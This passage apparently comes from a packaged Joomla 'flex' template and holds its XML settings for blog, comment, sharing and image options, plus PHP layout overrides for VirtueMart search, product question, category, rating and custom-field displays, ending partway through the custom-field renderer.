                <field name="custom_js" type="textarea" rows="5" label="HELIX_CUSTOM_JS" description="HELIX_CUSTOM_JS_DESC" filter="raw" />
            </fieldset>
            <!--End Custom Code Tab-->

            <!--Start Advanced Tab-->
            <fieldset name="advance">
                <field type="group" title="HELIX_CACHE_SETTINGS" />
                <field name="compress_css" type="radio" default="0" label="HELIX_CSS_COMPRESS" description="HELIX_CSS_COMPRESS_DESC">
                    <option value="1">HELIX_YES</option>
                    <option value="0">HELIX_NO</option>
                </field>
                <field name="compress_js" type="radio" class="parent compress_js" default="0" label="HELIX_JS_COMPRESS" description="HELIX_CSS_COMPRESS_DESC">
                    <option value="1">HELIX_YES</option>
                    <option value="0">HELIX_NO</option>
                </field>
                <field name="exclude_js" type="textarea" class="child compress_js compress_js_1" hint="jquery.min.js" label="HELIX_EXCLUDE_JS" description="HELIX_EXCLUDE_JS_DESC" />
				
				<field type="group" title="FLEX_COMPRESS_HTML"  />
				<field name="strip_whitespace" type="radio" default="0" label="FLEX_STRIP_WHITESPACE" description="FLEX_STRIP_WHITESPACE_DESC">
                    <option value="1">HELIX_YES</option>
                    <option value="0">HELIX_NO</option>
                </field>

                <field type="group" title="HELIX_LESS"  />
                <field name="lessoption" type="radio" default="1" label="HELIX_ENABLE_LESS" description="HELIX_ENABLE_LESS_DESC">
                    <option value="1">HELIX_YES</option>
                    <option value="0">HELIX_NO</option>
                </field>
				
				<field type="group" title="FLEX_LAZYLOAD_IMAGES"  />
                <field name="lazyload" type="radio" default="1" label="FLEX_LAZYLOAD_IMAGES_LABEL" description="FLEX_LAZYLOAD_IMAGES_DESC">
                    <option value="1">HELIX_YES</option>
                    <option value="0">HELIX_NO</option>
                </field>
				
				<field type="group" title="FLEX_SMOOTH_SCROLL"  />
                <field name="smooth_scroll_version" type="radio" default="3" label="FLEX_SMOOTH_SCROLL_VERSION" description="FLEX_SMOOTH_SCROLL_VERSION_DESC">
                    <option value="1">Version 1.3.8</option>
                    <option value="2">Version 1.4.9</option>
					<option value="3">Version 1.4.10</option>
					<option value="0">Disable</option>
                </field>

                <field type="group" title="HELIX_IMPORT_EXPORT" />
                <field name="export_options" type="optionio" label="HELIX_IMPORT_EXPORT_FIELD"/>
				
				<field type="group" title="FLEX_MOOTOOLS_FIXES"  />
				<field name="remove_mootools" type="radio" default="0" label="FLEX_REMOVE_MOOTOOLS" description="FLEX_REMOVE_MOOTOOLS_DESC">
                    <option value="1">HELIX_YES</option>
                    <option value="0">HELIX_NO</option>
                </field>
				<field name="mootools_fix" type="radio" default="0" label="FLEX_MOOTOOLS_FIX" description="FLEX_MOOTOOLS_FIX_DESC">
                    <option value="1">HELIX_YES</option>
                    <option value="0">HELIX_NO</option>
                </field>
				<field type="group" title="FLEX_REMOVE_JOOMLA_GENERATOR" />
				<field name="remove_joomla_generator" type="radio" default="1" label="FLEX_REMOVE_JOOMLA_GENERATOR_LABEL" description="FLEX_REMOVE_JOOMLA_GENERATOR_DESC">
                    <option value="1">HELIX_YES</option>
                    <option value="0">HELIX_NO</option>
                </field>

            </fieldset>
            <!--End Advanced Tab-->

            <!--Start Blog Tab-->
            <fieldset name="blog">
                <field type="group" title="BLOG_LAYOUT" />
				
				<field name="blog_layout" type="radio" class="parent blog_layout" default="masonry" label="FLEX_BLOG_LAYOUT" description="FLEX_BLOG_LAYOUT_DESC">
                    <option value="masonry">FLEX_MASONRY</option>
                    <option value="classic">FLEX_CLASSIC</option>
                </field>
				<field name="blog_item_spacing" type="apslide" class="child blog_layout blog_layout_masonry" data-content="data-content" default="0" data-slider-range="0,40" data-slider-step="1" label="FLEX_BLOG_ITEM_SPACING" append="px" description="FLEX_BLOG_ITEM_SPACING_DESC" />
				<field name="blog_item_bg" class="child blog_layout blog_layout_masonry" type="colorpicker" default="" label="FLEX_BLOG_ITEM_BG_COLOR" description="FLEX_BLOG_ITEM_BG_COLOR_DESC" />
				
				
				<field type="group" title="HELIX_POST_FORMAT" />
                <field name="show_post_format" class="parent show_post_format" type="radio" default="1" label="HELIX_SHOW_POST_FORMAT" description="HELIX_SHOW_POST_FORMAT_DESC">
                    <option value="1">HELIX_YES</option>
                    <option value="0">HELIX_NO</option>
                </field>
                <field name="custom_standard_icon" type="text" label="FLEX_CUSTOM_STANDARD_POST_FORMAT_ICON" description="FLEX_CUSTOM_STANDARD_POST_FORMAT_ICON_DESC" class="child show_post_format show_post_format_1" hint="fa fa-pencil-square-o" />
				<field name="custom_gallery_icon" type="text" label="FLEX_CUSTOM_GALLERY_POST_FORMAT_ICON" description="FLEX_CUSTOM_GALLERY_POST_FORMAT_ICON_DESC" class="child show_post_format show_post_format_1" hint="fa fa-picture-o" />
				<field name="custom_video_icon" type="text" label="FLEX_CUSTOM_VIDEO_POST_FORMAT_ICON" description="FLEX_CUSTOM_VIDEO_POST_FORMAT_ICON_DESC" class="child show_post_format show_post_format_1" hint="fa fa-video-camera" />
				<field name="custom_audio_icon" type="text" label="FLEX_CUSTOM_AUDIO_POST_FORMAT_ICON" description="FLEX_CUSTOM_AUDIO_POST_FORMAT_ICON_DESC" class="child show_post_format show_post_format_1" hint="fa fa-music" />
				<field name="custom_link_icon" type="text" label="FLEX_CUSTOM_LINK_POST_FORMAT_ICON" description="FLEX_CUSTOM_LINK_POST_FORMAT_ICON_DESC" class="child show_post_format show_post_format_1" hint="fa fa-link" />
				<field name="custom_status_icon" type="text" label="FLEX_CUSTOM_STATUS_POST_FORMAT_ICON" description="FLEX_CUSTOM_STATUS_POST_FORMAT_ICON_DESC" class="child show_post_format show_post_format_1" hint="fa fa-comment-o" />
				<field name="custom_quote_icon" type="text" label="FLEX_CUSTOM_QUOTE_POST_FORMAT_ICON" description="FLEX_CUSTOM_QUOTE_POST_FORMAT_ICON_DESC" class="child show_post_format show_post_format_1" hint="fa fa-quote-left" />    
				<field name="custom_post_icon" type="text" label="FLEX_CUSTOM_POST_FORMAT_ICON" description="FLEX_CUSTOM_POST_FORMAT_ICON_DESC" class="child show_post_format show_post_format_1" hint="pe pe-7s-film" />

                <field type="group" title="HELIX_COMMENTS" />
                <field name="commenting_engine" type="list" default="disabled" class="parent comment_engine" label="HELIX_COMMENTING_ENGINE" description="HELIX_COMMENTING_ENGINE_DESC">
                    <option value="disqus">HELIX_DISQUSS</option>
                    <option value="intensedebate">HELIX_INTENSEDEBATE</option>
                    <option value="facebook">HELIX_FB</option>
                    <option value="disabled">HELIX_DISABLED</option>
                </field>
                <field name="disqus_subdomain" type="text" class="child comment_engine comment_engine_disqus" label="HELIX_DISQUS_SUBDOMAIN" description="HELIX_DISQUS_SUBDOMAIN_DESC" />
                <field name="disqus_devmode" type="radio" class="btn-group child comment_engine comment_engine_disqus" default="0" label="HELIX_DISQUS_DEV_MODE" description="HELIX_DISQUS_DEV_MODE_DESC">
                    <option value="1">HELIX_YES</option>
                    <option value="0">HELIX_NO</option>
                </field>
                <field name="intensedebate_acc" type="text" default="" class="child comment_engine comment_engine_intensedebate" label="HELIX_INTENSEDEBATE_ACC" description="HELIX_INTENSEDEBATE_ACC_DESC" />
                <field name="fb_appID" type="text" class="child comment_engine comment_engine_facebook" label="HELIX_FB_ID" description="HELIX_FB_ID_DESC" />
                <field name="fb_width" type="number" default="500" class="child comment_engine comment_engine_facebook" label="HELIX_FB_COMMENTS_WIDTH" description="HELIX_FB_COMMENTS_WIDTH_DESC" />
                <field name="fb_cpp" type="number" default="10" class="child comment_engine comment_engine_facebook" label="HELIX_FB_COMMENTS_PER_PAGE" description="HELIX_FB_COMMENTS_PER_PAGE_DESC" />
                <field name="comments_count" type="radio" default="0" class="btn-group child comment_engine comment_engine_disqus comment_engine_intensedebate comment_engine_facebook" label="HELIX_COMMENTS_COUNT" description="HELIX_COMMENTS_COUNT_DESC">
                    <option value="1">HELIX_YES</option>
                    <option value="0">HELIX_NO</option>
                </field>

                <field type="group" title="HELIX_SOCIAL_SHARE" />
                <field name="social_share" type="radio" default="1" label="HELIX_ENABLE_SOCIAL_SHARE" description="HELIX_ENABLE_SOCIAL_SHARE_DESC">
                    <option value="1">HELIX_YES</option>
                    <option value="0">HELIX_NO</option>
                </field>
				<field name="share_facebook" type="radio" default="1" label="HELIX_FACEBOOK" description="HELIX_SHARE_FACEBOOK" showon="social_share:1">
                    <option value="1">HELIX_YES</option>
                    <option value="0">HELIX_NO</option>
                </field>
                <field name="share_twitter" type="radio" default="1" label="HELIX_TWITTER" description="HELIX_SHARE_TWITTER" showon="social_share:1">
                    <option value="1">HELIX_YES</option>
                    <option value="0">HELIX_NO</option>
                </field>
				<field name="share_google_plus" type="radio" default="1" label="Google Plus" description="HELIX_SHARE_GOOGLE_PLUS" showon="social_share:1">
                    <option value="1">HELIX_YES</option>
                    <option value="0">HELIX_NO</option>
                </field>
				<field name="share_linkedin" type="radio" default="1" label="Linkedin" description="HELIX_SHARE_LINKEDIN" showon="social_share:1">
                    <option value="1">HELIX_YES</option>
                    <option value="0">HELIX_NO</option>
                </field>

                <!--Blog Image-->
                <field type="group" title="HELIX_IMAGE_SIZES" />
                <field name="image_small" type="radio" default="0" class="parent image_small" label="HELIX_IMAGE_SMALL" description="HELIX_IMAGE_SMALL_DESC">
                    <option value="1">HELIX_YES</option>
                    <option value="0">HELIX_NO</option>
                </field>
                <field name="image_small_size" type="text" default="100x100" hint="100x100" class="child image_small image_small_1" label="HELIX_IMAGE_SMALL_SIZE" description="HELIX_IMAGE_SMALL_SIZE_DESC" />
                
                <field name="image_thumbnail" type="radio" default="1" class="parent image_thumbnail" label="HELIX_IMAGE_THUMBNAIL" description="HELIX_IMAGE_THUMBNAIL_DESC">
                    <option value="1">HELIX_YES</option>
                    <option value="0">HELIX_NO</option>
                </field>
                <field name="image_thumbnail_size" type="text" default="200x200" hint="200x200" class="child image_thumbnail image_thumbnail_1" label="HELIX_IMAGE_THUMBNAIL_SIZE" description="HELIX_IMAGE_THUMBNAIL_SIZE_DESC" />
                
                <field name="image_medium" type="radio" default="0" class="parent image_medium" label="HELIX_IMAGE_MEDIUM" description="HELIX_IMAGE_MEDIUM_DESC">
                    <option value="1">HELIX_YES</option>
                    <option value="0">HELIX_NO</option>
                </field>
                <field name="image_medium_size" type="text" default="300x300" hint="300x300" class="child image_medium image_medium_1" label="HELIX_IMAGE_MEDIUM_SIZE" description="HELIX_IMAGE_MEDIUM_SIZE_DESC" />

                <field name="image_large" type="radio" default="0" class="parent image_large" label="HELIX_IMAGE_LARGE" description="HELIX_IMAGE_LARGE_DESC">
                    <option value="1">HELIX_YES</option>
                    <option value="0">HELIX_NO</option>
                </field>
                <field name="image_large_size" type="text" default="600x600" hint="600x600" class="child image_large image_large_1" label="HELIX_IMAGE_LARGE_SIZE" description="HELIX_IMAGE_LARGE_SIZE_DESC" />

                <field name="blog_list_image" type="list" default="default" label="HELIX_BLOG_LIST_IMAGE" description="HELIX_BLOG_LIST_IMAGE_DESC">
                    <option value="default">HELIX_BLOG_LIST_IMAGE_DEFAULT</option>
                    <option value="small">HELIX_BLOG_LIST_IMAGE_SMALL</option>
                    <option value="thumbnail">HELIX_BLOG_LIST_IMAGE_THUMBNAIL</option>
                    <option value="medium">HELIX_BLOG_LIST_IMAGE_MEDIUM</option>
                    <option value="large">HELIX_BLOG_LIST_IMAGE_LARGE</option>
                </field>
            </fieldset>
            <!--End Blog Tab-->
        </fields>
    </config>
</extension>PK!�"�+flex/html/mod_virtuemart_search/default.phpnu&1i�<?php // no direct access
defined('_JEXEC') or die('Restricted access'); ?>
<!--BEGIN Search Box -->
<form action="<?php echo JRoute::_('index.php?option=com_virtuemart&view=category&search=true&limitstart=0&virtuemart_category_id='.$category_id ); ?>" method="get">
<div class="search<?php echo $moduleclass_sfx ?> flex-search">
<?php $output = '<input name="keyword" id="mod_virtuemart_search" maxlength="'.$maxlength.'" alt="'.$button_text.'" class="inputbox search-query'.$moduleclass_sfx.'" type="text" size="'.$width.'" value="'.$text.'"  onblur="if(this.value==\'\') this.value=\''.$text.'\';" onfocus="if(this.value==\''.$text.'\') this.value=\'\';" />';
 $image = JURI::base().'components/com_virtuemart/assets/images/vmgeneral/search.png' ;

			if ($button) :
			    if ($imagebutton) :
			        $button = '<input style="vertical-align :middle;height:16px;border: 1px solid #CCC;" type="image" value="'.$button_text.'" class="button'.$moduleclass_sfx.'" src="'.$image.'" onclick="this.form.keyword.focus();"/>';
			    else :
			        $button = '<input type="submit" value="'.$button_text.'" class="button'.$moduleclass_sfx.'" onclick="this.form.keyword.focus();"/>';
			    endif;
		

			switch ($button_pos) :
			    case 'top' :
				    $button = $button.'<br />';
				    $output = $button.$output;
				    break;

			    case 'bottom' :
				    $button = '<br />'.$button;
				    $output = $output.$button;
				    break;

			    case 'right' :
				    $output = $output.$button;
				    break;

			    case 'left' :
			    default :
				    $output = $button.$output;
				    break;
			endswitch;
			endif;
			
			echo $output;
?>
</div>
		<input type="hidden" name="limitstart" value="0" />
		<input type="hidden" name="option" value="com_virtuemart" />
		<input type="hidden" name="view" value="category" />
		<input type="hidden" name="virtuemart_category_id" value="<?php echo $category_id; ?>"/>
<?php if(!empty($set_Itemid)){
	echo '<input type="hidden" name="Itemid" value="'.$set_Itemid.'" />';
} ?>

	  </form>

<!-- End Search Box -->
PK!��PUU3flex/html/mod_articles_categories/default_items.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  mod_articles_categories
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

foreach ($list as $item) : ?>
	<li <?php if ($_SERVER['PHP_SELF'] == JRoute::_(ContentHelperRoute::getCategoryRoute($item->id))) echo ' class="active"';?>>
		<a href="<?php echo JRoute::_(ContentHelperRoute::getCategoryRoute($item->id)); ?>">
		<?php echo $item->title;?>
			<?php if ($params->get('numitems')) : ?>
				(<?php echo $item->numitems; ?>)
			<?php endif; ?>
		</a>
   		
		<?php if ($params->get('show_description', 0)) : ?>
			<?php echo JHtml::_('content.prepare', $item->description, $item->getParams(), 'mod_articles_categories.content'); ?>
		<?php endif; ?>
		<?php if ($params->get('show_children', 0) && (($params->get('maxlevel', 0) == 0)
			|| ($params->get('maxlevel') >= ($item->level - $startLevel)))
			&& count($item->getChildren())) : ?>
			<?php echo '<ul>'; ?>
			<?php $temp = $list; ?>
			<?php $list = $item->getChildren(); ?>
			<?php require JModuleHelper::getLayoutPath('mod_articles_categories', $params->get('layout', 'default') . '_items'); ?>
			<?php $list = $temp; ?>
			<?php echo '</ul>'; ?>
		<?php endif; ?>
	</li>
<?php endforeach; ?>
PK!g���,,-flex/html/mod_articles_categories/default.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  mod_articles_category
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

?>
<ul class="category-module<?php echo $moduleclass_sfx; ?>">
	<?php if ($grouped) : ?>
		<?php foreach ($list as $group_name => $group) : ?>
		<li>
			<ul>
				<?php foreach ($group as $item) : ?>
					<li>
						<?php if ($params->get('link_titles') == 1) : ?>
							<a class="mod-articles-category-title <?php echo $item->active; ?>" href="<?php echo $item->link; ?>">
								<?php echo $item->title; ?>
							</a>
						<?php else : ?>
							<?php echo $item->title; ?>
						<?php endif; ?>
	
						<?php if ($item->displayHits) : ?>
							<span class="mod-articles-category-hits">
								(<?php echo $item->displayHits; ?>)
							</span>
						<?php endif; ?>
	
						<?php if ($params->get('show_author')) : ?>
							<span class="mod-articles-category-writtenby">
								<?php echo $item->displayAuthorName; ?>
							</span>
						<?php endif;?>
	
						<?php if ($item->displayCategoryTitle) : ?>
							<span class="mod-articles-category-category">
								(<?php echo $item->displayCategoryTitle; ?>)
							</span>
						<?php endif; ?>
	
						<?php if ($item->displayDate) : ?>
							<span class="mod-articles-category-date"><?php echo $item->displayDate; ?></span>
						<?php endif; ?>
	
						<?php if ($params->get('show_introtext')) : ?>
							<p class="mod-articles-category-introtext">
								<?php echo $item->displayIntrotext; ?>
							</p>
						<?php endif; ?>
	
						<?php if ($params->get('show_readmore')) : ?>
							<p class="mod-articles-category-readmore">
								<a class="mod-articles-category-title <?php echo $item->active; ?>" href="<?php echo $item->link; ?>">
									<?php if ($item->params->get('access-view') == false) : ?>
										<?php echo JText::_('MOD_ARTICLES_CATEGORY_REGISTER_TO_READ_MORE'); ?>
									<?php elseif ($readmore = $item->alternative_readmore) : ?>
										<?php echo $readmore; ?>
										<?php echo JHtml::_('string.truncate', $item->title, $params->get('readmore_limit')); ?>
											<?php if ($params->get('show_readmore_title', 0) != 0) : ?>
												<?php echo JHtml::_('string.truncate', ($this->item->title), $params->get('readmore_limit')); ?>
											<?php endif; ?>
									<?php elseif ($params->get('show_readmore_title', 0) == 0) : ?>
										<?php echo JText::sprintf('MOD_ARTICLES_CATEGORY_READ_MORE_TITLE'); ?>
									<?php else : ?>
										<?php echo JText::_('MOD_ARTICLES_CATEGORY_READ_MORE'); ?>
										<?php echo JHtml::_('string.truncate', ($item->title), $params->get('readmore_limit')); ?>
									<?php endif; ?>
								</a>
							</p>
						<?php endif; ?>
					</li>
				<?php endforeach; ?>
			</ul>
		</li>
		<?php endforeach; ?>
	<?php else : ?>
		<?php foreach ($list as $item) : ?>
			<li>
				<?php if ($params->get('link_titles') == 1) : ?>
					<a class="mod-articles-category-title <?php echo $item->active; ?>" href="<?php echo $item->link; ?>">
						<?php echo $item->title; ?>
					</a>
				<?php else : ?>
					<?php echo $item->title; ?>
				<?php endif; ?>
	
				<?php if ($item->displayHits) : ?>
					<span class="mod-articles-category-hits">
						(<?php echo $item->displayHits; ?>)
					</span>
				<?php endif; ?>
	
				<?php if ($params->get('show_author')) : ?>
					<span class="mod-articles-category-writtenby">
						<?php echo $item->displayAuthorName; ?>
					</span>
				<?php endif;?>
	
				<?php if ($item->displayCategoryTitle) : ?>
					<span class="mod-articles-category-category">
						(<?php echo $item->displayCategoryTitle; ?>)
					</span>
				<?php endif; ?>
	
				<?php if ($item->displayDate) : ?>
					<span class="mod-articles-category-date">
						<?php echo $item->displayDate; ?>
					</span>
				<?php endif; ?>
	
				<?php if ($params->get('show_introtext')) : ?>
					<p class="mod-articles-category-introtext">
						<?php echo $item->displayIntrotext; ?>
					</p>
				<?php endif; ?>
	
				<?php if ($params->get('show_readmore')) : ?>
					<p class="mod-articles-category-readmore">
						<a class="mod-articles-category-title <?php echo $item->active; ?>" href="<?php echo $item->link; ?>">
							<?php if ($item->params->get('access-view') == false) : ?>
								<?php echo JText::_('MOD_ARTICLES_CATEGORY_REGISTER_TO_READ_MORE'); ?>
							<?php elseif ($readmore = $item->alternative_readmore) : ?>
								<?php echo $readmore; ?>
								<?php echo JHtml::_('string.truncate', $item->title, $params->get('readmore_limit')); ?>
							<?php elseif ($params->get('show_readmore_title', 0) == 0) : ?>
								<?php echo JText::sprintf('MOD_ARTICLES_CATEGORY_READ_MORE_TITLE'); ?>
							<?php else : ?>
								<?php echo JText::_('MOD_ARTICLES_CATEGORY_READ_MORE'); ?>
								<?php echo JHtml::_('string.truncate', $item->title, $params->get('readmore_limit')); ?>
							<?php endif; ?>
						</a>
					</p>
				<?php endif; ?>
			</li>
		<?php endforeach; ?>
	<?php endif; ?>
</ul>
PK!vuc<��-flex/html/com_virtuemart/askquestion/form.phpnu&1i�<?php
/**
 *TODO Improve the CSS , ADD CATCHA ?
 * Show the form Ask a Question
 *
 * @package	VirtueMart
 * @subpackage
 * @author Kohl Patrick, Maik K�nnemann
 * @link http://www.virtuemart.net
 * @copyright Copyright (c) 2004 - 2014 VirtueMart Team. All rights reserved.
 * @license http://www.gnu.org/copyleft/gpl.html GNU/GPL, see LICENSE.php
 * VirtueMart is free software. This version may have been modified pursuant
 * to the GNU General Public License, and as distributed it includes or
 * is derivative of works licensed under the GNU General Public License or
 * other free or open source software licenses.
* @version $Id: default.php 2810 2011-03-02 19:08:24Z Milbo $
 */

// Check to ensure this file is included in Joomla!
defined ( '_JEXEC' ) or die ( 'Restricted access' );
$min = VmConfig::get('asks_minimum_comment_length', 50);
$max = VmConfig::get('asks_maximum_comment_length', 2000) ;
vmJsApi::JvalideForm();
vmJsApi::addJScript('askform','
	jQuery(function($){
			jQuery("#askform").validationEngine("attach");
			jQuery("#comment").keyup( function () {
				var result = $(this).val();
					$("#counter").val( result.length );
			});
	});
');
/* Let's see if we found the product */
if (empty ( $this->product )) {
	echo vmText::_ ( 'COM_VIRTUEMART_PRODUCT_NOT_FOUND' );
	echo '<br /><br />  ' . $this->continue_link_html;
} else {
	$session = JFactory::getSession();
	$sessData = $session->get('askquestion', 0, 'vm');
	if(!empty($this->login)){
		echo $this->login;
	}
	if(empty($this->login) or VmConfig::get('recommend_unauth',false)){
		?>
		<div style="margin:0;padding:10px 20px;" class="ask-a-question-view">
			<h1 style="line-height:1;"><?php echo vmText::_('COM_VIRTUEMART_PRODUCT_ASK_QUESTION')  ?></h1>

			<div class="product-summary">
				<div class="floatleft">
                <div style="padding:0;margin:12px 0 0 15px;" class="width30 floatright center">
					<?php // Product Image
					echo $this->product->images[0]->displayMediaThumb('class="product-image"',false); ?>
				</div>
					<h2><?php echo $this->product->product_name ?></h2>

					<?php // Product Short Description
					if (!empty($this->product->product_s_desc)) { ?>
						<div class="short-description">
							<?php echo $this->product->product_s_desc ?>
						</div>
					<?php } // Product Short Description END ?>

				</div>

				<div class="clear"></div>
			</div>

			<div class="form-field">

				<form method="post" class="form-validate" action="<?php echo JRoute::_('index.php?option=com_virtuemart&view=productdetails&virtuemart_product_id='.$this->product->virtuemart_product_id.'&virtuemart_category_id='.$this->product->virtuemart_category_id.'&tmpl=component', FALSE) ; ?>" name="askform" id="askform">

					<table class="askform">
						<tr>
							<td><label for="name"><?php echo vmText::_('COM_VIRTUEMART_USER_FORM_NAME')  ?> : </label></td>
							<td><input type="text" class="validate[required,minSize[3],maxSize[64]]" value="<?php echo $this->user->name ? $this->user->name : $sessData['name'] ?>" name="name" id="name" size="30"  validation="required name"/></td>
						</tr>
						<tr>
							<td><label for="email"><?php echo vmText::_('COM_VIRTUEMART_USER_FORM_EMAIL')  ?> : </label></td>
							<td><input type="text" class="validate[required,custom[email]]" value="<?php echo $this->user->email ? $this->user->email : $sessData['email'] ?>" name="email" id="email" size="30"  validation="required email"/></td>
						</tr>
						<tr>
							<td colspan="2"><label for="comment"><?php echo vmText::sprintf('COM_VIRTUEMART_ASK_COMMENT', $min, $max); ?></label></td>
						</tr>
						<tr>
							<td colspan="2"><textarea title="<?php echo vmText::sprintf('COM_VIRTUEMART_ASK_COMMENT', $min, $max) ?>" class="validate[required,minSize[<?php echo $min ?>],maxSize[<?php echo $max ?>]] field" id="comment" name="comment" rows="8"><?php echo $sessData['comment'] ?></textarea></td>
						</tr>
					</table>

					<div class="submit">
						<?php // captcha addition
							echo $this->captcha;
						// end of captcha addition 
						?>
            <div>
              <div class="floatleft width50">
                <input class="btn sppb-btn-dark" type="submit" name="submit_ask" title="<?php echo vmText::_('COM_VIRTUEMART_ASK_SUBMIT')  ?>" value="<?php echo vmText::_('COM_VIRTUEMART_ASK_SUBMIT')  ?>" />
              </div>
              <div class="floatleft width50 text-right">
                <label for="counter"><?php echo vmText::_('COM_VIRTUEMART_ASK_COUNT')  ?></label>
  							<input style="height:18px;padding:7px;width:30%;" type="text" value="0" size="4" class="counter" id="counter" name="counter" maxlength="4" readonly />
              </div>
              <div class="clear"></div>
            </div>
					</div>

					<input type="hidden" name="virtuemart_product_id" value="<?php echo vRequest::getInt('virtuemart_product_id',0); ?>" />
					<input type="hidden" name="tmpl" value="component" />
					<input type="hidden" name="view" value="productdetails" />
					<input type="hidden" name="option" value="com_virtuemart" />
					<input type="hidden" name="virtuemart_category_id" value="<?php echo vRequest::getInt('virtuemart_category_id'); ?>" />
					<input type="hidden" name="task" value="mailAskquestion" />
					<?php echo JHTML::_( 'form.token' ); ?>
				</form>

			</div>
		</div>
<?php
	}
} ?>
PK!S��+--2flex/html/com_virtuemart/sublayouts/categories.phpnu&1i�<?php
/**
*
* Shows the products/categories of a category
*
* @package	VirtueMart
* @subpackage
* @author Max Milbers
* @link http://www.virtuemart.net
* @copyright Copyright (c) 2004 - 2014 VirtueMart Team. All rights reserved.
* @license http://www.gnu.org/copyleft/gpl.html GNU/GPL, see LICENSE.php
* VirtueMart is free software. This version may have been modified pursuant
* to the GNU General Public License, and as distributed it includes or
* is derivative of works licensed under the GNU General Public License or
* other free or open source software licenses.
 * @version $Id: default.php 6104 2012-06-13 14:15:29Z alatak $
*/

// Check to ensure this file is included in Joomla!
defined('_JEXEC') or die('Restricted access');

$categories = $viewData['categories'];
$categories_per_row = VmConfig::get ( 'categories_per_row', 3 );


if ($categories) {

// Category and Columns Counter
$iCol = 1;
$iCategory = 1;

// Calculating Categories Per Row
$category_cellwidth = ' width'.floor ( 100 / $categories_per_row );

// Separator
$verticalseparator = " vertical-separator";
?>

<div class="category-view related-category-view">

<?php 

// Start the Output
    foreach ( $categories as $category ) {

	    // Show the horizontal seperator
	    if ($iCol == 1 && $iCategory > $categories_per_row) { ?>
	    <div class="horizontal-separator"></div>
	    <?php }

	    // this is an indicator wether a row needs to be opened or not
	    if ($iCol == 1) { ?>
  <div class="row productwrap">
        <?php }

        // Show the vertical separator
        if ($iCategory == $categories_per_row or $iCategory % $categories_per_row == 0) {
          $show_vertical_separator = ' ';
        } else {
          $show_vertical_separator = $verticalseparator;
        }

        // Category Link
        $caturl = JRoute::_ ( 'index.php?option=com_virtuemart&view=category&virtuemart_category_id=' . $category->virtuemart_category_id , FALSE);

          // Show Category ?>
    <div class="product col-sm-6 col-md-<?php echo round(12/$categories_per_row) . $show_vertical_separator ?>">
      <div class="spacer">
          <div class="spacer-img">
            <a href="<?php echo $caturl ?>">
              <?php // if ($category->ids) {
                echo $category->images[0]->displayMediaThumb("",false);
                echo '<span class="overlay"><h3>'.vmText::_($category->category_name).'</h3></span>';
              //} ?>
              </a>
          </div>
      </div>
    </div>
	    <?php
	    $iCategory ++;

	    // Do we need to close the current row now?
        if ($iCol == $categories_per_row) { ?>
    <div class="clear"></div>
	</div>
		    <?php
		    $iCol = 1;
	    } else {
		    $iCol ++;
	    }
    }
	// Do we need a final closing row tag?
	if ($iCol != 1) { ?>
		<div class="clear"></div>
	</div>
	<?php
	}
	?></div><?php
 } ?>
PK!��)*��.flex/html/com_virtuemart/sublayouts/rating.phpnu&1i�<?php defined('_JEXEC') or die('Restricted access');

$product = $viewData['product'];

if ($viewData['showRating']) {
	$maxrating = VmConfig::get('vm_maximum_rating_scale', 5);
	if (empty($product->rating)) {
	?>
		<div class="ratingbox dummy" title="<?php echo vmText::_('COM_VIRTUEMART_UNRATED'); ?>" >

		</div>
	<?php
	} else {
		$ratingwidth = $product->rating * 13;
  ?>

<div title="<?php echo (vmText::_("COM_VIRTUEMART_RATING_TITLE") . ': ' . round($product->rating) . '/' . $maxrating) ?>" class="ratingbox" data-toggle="tooltip">
  <div class="stars-orange" style="width:<?php echo $ratingwidth.'px'; ?>"></div>
</div>
	<?php
	}
}PK!�W�����3flex/html/com_virtuemart/sublayouts/customfield.phpnu&1i�<?php
/**
 *
 * renders a customfield
 *
 * @package    VirtueMart
 * @subpackage
 * @author Max Milbers, Valerie Isaksen
 * @link https://virtuemart.net
 * @copyright Copyright (c) 2015 VirtueMart Team. All rights reserved.
 * @license http://www.gnu.org/copyleft/gpl.html GNU/GPL, see LICENSE.php
 * @version $Id: addtocartbtn.php 8024 2014-06-12 15:08:59Z Milbo $
 */
// Check to ensure this file is included in Joomla!
defined ('_JEXEC') or die('Restricted access');

class VirtueMartCustomFieldRenderer {



	static function renderCustomfieldsFE(&$product,&$customfields,$virtuemart_category_id){

		static $calculator = false;
		if(!$calculator){
			$calculator = calculationHelper::getInstance ();
		}

		$selectList = array();

		$dynChilds = 1;

		static $currency = false;
		if(!$currency){
			$currency = CurrencyDisplay::getInstance ();
		}

		foreach($customfields as $key => $customfield){


			if(!isset($customfield->display))$customfield->display = '';

			$calculator->_product = $product;

			if ($customfield->field_type == "E") {

				VmConfig::importVMPlugins ('vmcustom');
				$dispatcher = JDispatcher::getInstance ();
				$ret = $dispatcher->trigger ('plgVmOnDisplayProductFEVM3', array(&$product, &$customfields[$key]));
				continue;
			}

			$fieldname = 'field['.$product->virtuemart_product_id.'][' . $customfield->virtuemart_customfield_id . '][customfield_value]';
			$customProductDataName = 'customProductData['.$product->virtuemart_product_id.']['.$customfield->virtuemart_custom_id.']';

			//This is a kind of fallback, setting default of custom if there is no value of the productcustom
			$customfield->customfield_value = (!isset($customfield->customfield_value) or $customfield->customfield_value==='') ? $customfield->custom_value : $customfield->customfield_value;

			$type = $customfield->field_type;

			$idTag = 'customProductData_'.(int)$product->virtuemart_product_id.'_'.$customfield->virtuemart_customfield_id;
			$idTag = VmHtml::ensureUniqueId($idTag);

			$emptyOption = new stdClass();
			$emptyOption->text = vmText::_ ('COM_VIRTUEMART_ADDTOCART_CHOOSE_VARIANT');
			$emptyOption->value = 0;
			switch ($type) {

				case 'C':
					$html = '';

					$dropdowns = array();

					if(isset($customfield->options->{$product->virtuemart_product_id})){
						$productSelection = $customfield->options->{$product->virtuemart_product_id};
					} else {
						$productSelection = false;
					}
					$stockhandle = VmConfig::get('stockhandle_products', false) && $product->product_stockhandle ? $product->product_stockhandle : VmConfig::get('stockhandle','none');


					$extra = ' and ( published = "1" ';
					if($stockhandle == 'disableit_children'){
						$extra .= ' AND (`product_in_stock` - `product_ordered`) > "0" ';
					}
					$extra .= ')';


					$productModel = VmModel::getModel ('product');
